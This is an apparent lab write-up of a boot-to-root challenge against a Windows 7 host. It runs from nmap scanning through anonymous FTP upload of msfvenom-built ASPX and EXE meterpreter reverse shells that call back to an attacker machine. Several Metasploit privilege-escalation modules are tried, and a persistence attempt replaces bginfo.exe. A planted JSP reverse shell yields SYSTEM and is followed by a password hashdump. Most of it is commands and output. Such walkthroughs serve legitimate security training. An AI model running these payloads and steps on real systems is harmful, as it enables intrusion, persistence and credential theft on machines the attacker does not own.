Some fun I hacking on a boot to root challenge I did with a mate recently.
Enumeration
OS Fingerprint
root@kali:~/boot2root# nmap -O 192.168.0.102
Starting Nmap 7.60 ( https://nmap.org ) at 2018-07-26 22:44 EDT
Nmap scan report for 192.168.0.102
Host is up (0.00022s latency).
Not shown: 986 closed ports
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
8009/tcp open ajp13
8080/tcp open http-proxy
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
MAC Address: 00:50:56:A3:B7:92 (VMware)
Device type: general purpose
Running: Microsoft Windows 2008|Vista|7
OS CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1 cpe:/o:microsoft:windows_vista::sp1:home_premium cpe:/o:microsoft:windows_7
OS details: Microsoft Windows Server 2008 R2 SP1, Microsoft Windows Vista Home Premium SP1, Windows 7, or Windows Server 2008
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.26 seconds
A Windows box, running a bunch of services like ftp, two http servers, smb and ajp.
AJP is a wire protocol. It an optimized version of the HTTP protocol to allow a standalone web server such as Apache to talk to Tomcat. Historically, Apache has been much faster than Tomcat at serving static content. The idea is to let Apache serve the static content when possible, but proxy the request to Tomcat for Tomcat related content.
What services are running?
root@kali:~# nmap -A -sV 192.168.0.102
Starting Nmap 7.60 ( https://nmap.org ) at 2018-07-26 22:44 EDT
Nmap scan report for 192.168.0.102
Host is up (0.00026s latency).
Not shown: 986 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp FileZilla ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x 1 ftp ftp 0 Nov 13 2017 aspnet_client
| -rw-r--r-- 1 ftp ftp 89 Nov 13 2017 hello.aspx
|_-rw-r--r-- 1 ftp ftp 96 Nov 13 2017 index.html
|_ftp-bounce: bounce working!
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Enterprise 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ms-wbt-server Microsoft Terminal Service
| ssl-cert: Subject: commonName=IE11Win7
| Not valid before: 2018-06-14T00:58:43
|_Not valid after: 2018-12-14T00:58:43
|_ssl-date: 2018-07-27T02:46:09+00:00; -42s from scanner time.
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.82
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:50:56:A3:B7:92 (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.60%E=4%D=7/26%OT=21%CT=1%CU=31080%PV=Y%DS=1%DC=D%G=Y%M=005056%T
OS:M=5B5A87B4%P=x86_64-pc-linux-gnu)SEQ(SP=109%GCD=1%ISR=10D%TI=I%CI=I%TS=7
OS:)OPS(O1=M5B4NW8ST11%O2=M5B4NW8ST11%O3=M5B4NW8NNT11%O4=M5B4NW8ST11%O5=M5B
OS:4NW8ST11%O6=M5B4ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000
OS:)ECN(R=Y%DF=Y%T=80%W=2000%O=M5B4NW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+
OS:%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)
OS:T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A
OS:=O%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPC
OS:K=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)
Network Distance: 1 hop
Service Info: Host: IE11WIN7; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -51s, deviation: 13s, median: -1m01s
|_nbstat: NetBIOS name: IE11WIN7, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:a3:b7:92 (VMware)
| smb-os-discovery:
| OS: Windows 7 Enterprise 7601 Service Pack 1 (Windows 7 Enterprise 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1
| Computer name: IE11Win7
| NetBIOS computer name: IE11WIN7\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2018-07-26T19:46:09-07:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2018-07-26 22:46:10
|_ start_date: 2018-07-26 18:36:58
TRACEROUTE
HOP RTT ADDRESS
1 0.26 ms 192.168.0.102
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 148.76 seconds
Vulnerabilities scan Results
root@kali:~/boot2root# nmap --script vuln 192.168.0.102
Starting Nmap 7.60 ( https://nmap.org ) at 2018-07-26 22:44 EDT
Nmap scan report for 192.168.0.102
Host is up (0.00018s latency).
Not shown: 986 closed ports
PORT STATE SERVICE
21/tcp open ftp
|_sslv2-drown:
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
| Modulus Type: Safe prime
| Modulus Source: RFC2409/Oakley Group 2
| Modulus Length: 1024
| Generator Length: 1024
| Public Key Length: 1024
| References:
|_ https://weakdh.org
|_sslv2-drown:
8009/tcp open ajp13
8080/tcp open http-proxy
| http-enum:
| /examples/: Sample scripts
| /manager/html/upload: Apache Tomcat (401 Unauthorized)
| /manager/html: Apache Tomcat (401 Unauthorized)
|_ /docs/: Potentially interesting folder
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
MAC Address: 00:50:56:A3:B7:92 (VMware)
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
Nmap done: 1 IP address (1 host up) scanned in 201.12 seconds
Damn, no remote code execution vulnerablities, but lots of services to dig into.
Exploitation
Anonymous FTP - test login
root@kali:~/boot2root# ftp 192.168.0.102
Connected to 192.168.0.102.
220-FileZilla Server 0.9.60 beta
220-written by Tim Kosse (tim.kosse@filezilla-project.org)
220 Please visit https://filezilla-project.org/
Name (192.168.0.102:root): anonymous
331 Password required for anonymous
Password:
230 Logged on
Whats on the FTP server?
ftp> ls
200 Port command successful
150 Opening data channel for directory listing of "/"
drwxr-xr-x 1 ftp ftp 0 Nov 13 2017 aspnet_client
-rw-r--r-- 1 ftp ftp 89 Nov 13 2017 hello.aspx
-rw-r--r-- 1 ftp ftp 96 Nov 13 2017 index.html
ASP.NET probe
It looks like the web server (IIS on Windows) is configured to run aspx (ASP.NET) server side code. Verify this by visiting http:192.168.0.102/hello.aspx in a browser. Confirmed.
Create an ASPX reverse shell payload using MSFVenom
root@kali:~/boot2root# msfvenom -p windows/meterpreter/reverse_tcp -f aspx LHOST=192.168.0.99 LPORT=4444 -o rshell.aspx
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of aspx file: 2773 bytes
Saved as: rshell.aspx
Upload payload via anon FTP
root@kali:~/boot2root# ftp 192.168.0.102
Connected to 192.168.0.102.
220-FileZilla Server 0.9.60 beta
220-written by Tim Kosse (tim.kosse@filezilla-project.org)
220 Please visit https://filezilla-project.org/
Name (192.168.0.102:root): anonymous
331 Password required for anonymous
Password:
230 Logged on
Remote system type is UNIX.
ftp> lcd ~/boot2root
Local directory now /root/boot2root
ftp> put rshell.aspx
local: rshell.aspx remote: rshell.aspx
200 Port command successful
150 Opening data channel for file upload to server of "/rshell.aspx"
226 Successfully transferred "/rshell.aspx"
335 bytes sent in 0.00 secs (7.4298 MB/s)
Setup a listener to catch the reverse shell on port 4444
msf exploit(handler) > use exploit/multi/handler
msf exploit(handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.0.99 yes The listen address
LPORT 7777 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.0.99 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > run
[*] Exploit running as background job 5.
[*] Started reverse TCP handler on 192.168.0.99:444
Navigate to the remote payload in the browser by visiting http://192.168.0.102/rshell.aspx. This should activate the reverse shell.
msf exploit(handler) >
[*] Sending stage (179267 bytes) to 192.168.0.102
[*] Meterpreter session 16 opened (192.168.0.99:4444 -> 192.168.0.102:49158) at 2018-07-26 23:17:38 -0400
msf exploit(handler) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
16 meterpreter x86/windows IIS APPPOOL\MyFirstSite @ IE11WIN7 192.168.0.99:4444 -> 192.168.0.102:49158 (192.168.0.102)
msf exploit(handler) > sessions 16
[*] Starting interaction with 16...
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
240 4 smss.exe
336 328 csrss.exe
388 328 wininit.exe
396 380 csrss.exe
444 380 winlogon.exe
488 388 services.exe
496 388 lsass.exe
504 388 lsm.exe
608 488 svchost.exe
636 488 svchost.exe
672 488 svchost.exe
724 488 svchost.exe
792 444 LogonUI.exe
824 488 svchost.exe
876 488 svchost.exe
916 488 svchost.exe
976 488 sppsvc.exe
988 724 audiodg.exe x86 0
1136 488 svchost.exe
1248 488 spoolsv.exe
1284 488 svchost.exe
1356 488 vmicsvc.exe
1376 488 vmicsvc.exe
1404 488 vmicsvc.exe
1444 488 vmicsvc.exe
1472 488 vmicsvc.exe
1500 488 svchost.exe
1548 488 svchost.exe
1664 488 FileZilla Server.exe
1736 488 Tomcat7.exe
1764 336 conhost.exe
1804 488 vmtoolsd.exe
1836 488 svchost.exe
1880 488 wlms.exe
2248 608 WmiPrvSE.exe
2436 488 dllhost.exe
2488 488 dllhost.exe
2580 488 msdtc.exe
2708 488 VSSVC.exe
2856 1836 w3wp.exe x86 0 IIS APPPOOL\MyFirstSite c:\windows\system32\inetsrv\w3wp.exe
Create a binary native reverse shell with MSFVEnom
Prior experience shows that some meterpreter shells (particularly the web based ones like php and aspx) are less functional than their native OS binary equivalents, accordingly, we deployed a second access method using a meterpreter in a exe package.
root@kali:~/boot2root# msfvenom -p windows/meterpreter/reverse_tcp -f exe LHOST=192.168.0.99 LPORT=4444 -o rshell.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of exe file: 73802 bytes
Saved as: rshell.exe
Upload it through the ASP.NET shell
meterpreter > lcd /root/boot2root
meterpreter > upload rshell.exe
[*] uploading : rshell.exe -> rshell.exe
[*] uploaded : rshell.exe -> rshell.exe
Run it on the host
meterpreter > shell
Process 4052 created.
Channel 2 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\Test>dir
dir
Volume in drive C has no label.
Volume Serial Number is E0CE-337D
Directory of c:\Test
07/26/2018 08:19 PM <DIR> .
07/26/2018 08:19 PM <DIR> ..
11/13/2017 10:38 PM <DIR> New folder
07/26/2018 08:19 PM 333 rshell.exe
1 File(s) 333 bytes
3 Dir(s) 122,943,504,384 bytes free
c:\Test>rshell.exe
rshell.exe
c:\test>rshell.exe
[*] Sending stage (179267 bytes) to 192.168.0.102
rshell.exe
c:\test>[*] Meterpreter session 17 opened (192.168.0.99:4444 -> 192.168.0.102:49159) at 2018-07-26 23:25:03 -0400
Connect the new session
Background the ASP.NET remote shell session, and connect to the new (session 17) Windows binary native session:
meterpreter > background
[*] Backgrounding session 16...
msf exploit(handler) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
16 meterpreter x86/windows IIS APPPOOL\MyFirstSite @ IE11WIN7 192.168.0.99:4444 -> 192.168.0.102:49158 (192.168.0.102)
17 meterpreter x86/windows IIS APPPOOL\MyFirstSite @ IE11WIN7 192.168.0.99:4444 -> 192.168.0.102:49159 (192.168.0.102)
Attempt privilege Escalation
Try out some local privesc exploits.
msf exploit(handler) > use exploit/windows/local/ms13_053_schlamperei
msf exploit(ms13_053_schlamperei) > set SESSION 17
SESSION => 17
msf exploit(ms13_053_schlamperei) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms13_053_schlamperei) > set LHOST 192.168.0.99
LHOST => 192.168.0.99
msf exploit(ms13_053_schlamperei) > options
Module options (exploit/windows/local/ms13_053_schlamperei):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 17 yes The session to run this module on.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.0.99 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 7 SP0/SP1
msf exploit(ms13_053_schlamperei) > set LPORT 5555
LPORT => 5555
msf exploit(ms13_053_schlamperei) > run
[*] Started reverse TCP handler on 192.168.0.99:5555
[-] Exploit aborted due to failure: not-vulnerable: Exploit not available on this system
[*] Exploit completed, but no session was created.
Failed to work @ 14:11. Time to pivot, lets take MS10-015 for a spin.
msf exploit(ms14_058_track_popup_menu) > use exploit/windows/local/ms10_015_kitrap0d
msf exploit(ms10_015_kitrap0d) > options
Module options (exploit/windows/local/ms10_015_kitrap0d):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Exploit target:
Id Name
-- ----
0 Windows 2K SP4 - Windows 7 (x86)
msf exploit(ms10_015_kitrap0d) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_015_kitrap0d) > options
Module options (exploit/windows/local/ms10_015_kitrap0d):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 2K SP4 - Windows 7 (x86)
msf exploit(ms10_015_kitrap0d) > set LHOST 192.168.0.99
LHOST => 192.168.0.99
msf exploit(ms10_015_kitrap0d) > set LPORT 5555
LPORT => 5555
msf exploit(ms10_015_kitrap0d) > set SESSION 16
SESSION => 16
msf exploit(ms10_015_kitrap0d) > run
[-] Exploit failed: Msf::OptionValidateError The following options failed to validate: SESSION.
[*] Exploit completed, but no session was created.
msf exploit(ms10_015_kitrap0d) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
17 meterpreter x86/windows IIS APPPOOL\MyFirstSite @ IE11WIN7 192.168.0.99:4444 -> 192.168.0.102:49159 (192.168.0.102)
18 meterpreter x86/windows IIS APPPOOL\MyFirstSite @ IE11WIN7 192.168.0.99:5555 -> 192.168.0.102:49160 (192.168.0.102)
msf exploit(ms10_015_kitrap0d) > set SESSION 17
SESSION => 17
msf exploit(ms10_015_kitrap0d) > run
[*] Started reverse TCP handler on 192.168.0.99:5555
[*] Launching notepad to host the exploit...
[+] Process 4056 launched.
[*] Reflectively injecting the exploit DLL into 4056...
[*] Injecting exploit into 4056 ...
[*] Exploit injected. Injecting payload into 4056...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Exploit completed, but no session was created.
Failed to work @ 14:14. The machine appears to be fairly well patched. OK, quickly try out another MS14-058.
msf exploit(ms13_081_track_popup_menu) > use exploit/windows/local/ms14_058_track_popup_menu
msf exploit(ms14_058_track_popup_menu) > options
Module options (exploit/windows/local/ms14_058_track_popup_menu):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 17 yes The session to run this module on.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.0.99 yes The listen address
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x86
msf exploit(ms14_058_track_popup_menu) > run
[*] Started reverse TCP handler on 192.168.0.99:5555
[*] Launching notepad to host the exploit...
[+] Process 912 launched.
[*] Reflectively injecting the exploit DLL into 912...
[*] Injecting exploit into 912...
[*] Exploit injected. Injecting payload into 912...
[*] Payload injected. Executing exploit...
[*] Sending stage (179267 bytes) to 192.168.0.102
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 20 opened (192.168.0.99:5555 -> 192.168.0.102:49162) at 2018-07-26 23:47:00 -0400
meterpreter > getuid
Server username: IIS APPPOOL\MyFirstSite
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > background
[*] Backgrounding session 20...
msf exploit(ms14_058_track_popup_menu) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
17 meterpreter x86/windows IIS APPPOOL\MyFirstSite @ IE11WIN7 192.168.0.99:4444 -> 192.168.0.102:49159 (192.168.0.102)
18 meterpreter x86/windows IIS APPPOOL\MyFirstSite @ IE11WIN7 192.168.0.99:5555 -> 192.168.0.102:49160 (192.168.0.102)
19 meterpreter x86/windows IIS APPPOOL\MyFirstSite @ IE11WIN7 192.168.0.99:5555 -> 192.168.0.102:49161 (192.168.0.102)
20 meterpreter x86/windows IIS APPPOOL\MyFirstSite @ IE11WIN7 192.168.0.99:5555 -> 192.168.0.102:49162 (192.168.0.102)
msf exploit(ms14_058_track_popup_menu) > sessions 20
[*] Starting interaction with 20...
meterpreter > getuid
Server username: IIS APPPOOL\MyFirstSite
Failed to work @ 14:22.
OK, more enumeration.
meterpreter > sysinfo
Computer : IE11WIN7
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 0
Meterpreter : x86/windows
Persistence (possibly)
Overwrote bginfo.exe with a meterpreter executable to possible give us a new connection on a BGinfo run. Failed to trigger during the observation period, including after a reboot of the box.
Privilege Elevation Tomcat
From the enumeration, noticed tomcat is running on 8080. In the low priv shell, find where this is setup.
meterpreter > search -f *tomcat*
Found 43 results...
c:\Program Files\Apache Software Foundation\Tomcat 7.0\bin\tomcat-juli.jar (44739 bytes)
c:\Program Files\Apache Software Foundation\Tomcat 7.0\bin\Tomcat7.exe (86656 bytes)
c:\Program Files\Apache Software Foundation\Tomcat 7.0\bin\Tomcat7w.exe (110208 bytes)
...
Have a look around.
meterpreter > cd /Program\ Files/Apache\ Software\ Foundation/Tomcat\ 7.0/webapps
meterpreter > ls
Listing: c:\Program Files\Apache Software Foundation\Tomcat 7.0\webapps
=======================================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 4096 dir 2017-11-14 00:15:05 -0500 ROOT
40777/rwxrwxrwx 16384 dir 2017-11-14 00:15:06 -0500 docs
40777/rwxrwxrwx 4096 dir 2017-11-14 00:15:06 -0500 examples
40777/rwxrwxrwx 0 dir 2017-11-14 00:15:06 -0500 host-manager
40777/rwxrwxrwx 0 dir 2017-11-14 00:15:06 -0500 manager
40777/rwxrwxrwx 0 dir 2018-02-06 18:41:29 -0500 shell
100666/rw-rw-rw- 1087 fil 2018-02-06 18:41:29 -0500 shell.war
wtf!? shell.war?
Unpack shell.war (which is simply a gzip). Browse the source code in shell/swbjeakb.jsp.
if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
ShellPath = new String("/bin/sh");
} else {
ShellPath = new String("cmd.exe");
}
Socket socket = new Socket( "192.168.0.99", 4445 );
Process process = Runtime.getRuntime().exec( ShellPath );
( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
The payload appears to be starting a straight (i.e. non meterpreter) reverse shell, to 192.168.0.99 on port 4445. Lets try and catch that using netcat.
nc -nvlp 4445
Now in a browser, hit the tomcat server and file by navigating to http://192.168.0.102:8080/shell/
SYSTEM (root) privileges acheived
Boom! 14:37 on 2018-07-27 root shell timestamp.
Transition to root meterpreter session and grab credentials
In the root netcat session, browse to C:\Test where the native Windows meterpreter payload binary rshell.exe was uploaded. Run that under the context of the SYSTEM account.
[*] Sending stage (179267 bytes) to 192.168.0.102
[*] Meterpreter session 22 opened (192.168.0.99:4444 -> 192.168.0.102:49167) at 2018-07-27 00:05:01 -0400
msf exploit(handler) > sessions 23
[*] Starting interaction with 23...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IEUser:1000:aad3b435b51404eeaad3b435b51404ee:888e46c1cae5cd127519b7b914f018ee:::
meterpreter > shell
Process 2540 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Test>time
time
The current time is: 21:06:21.90
Enter the new time:
C:\Test>exit
exit
meterpreter >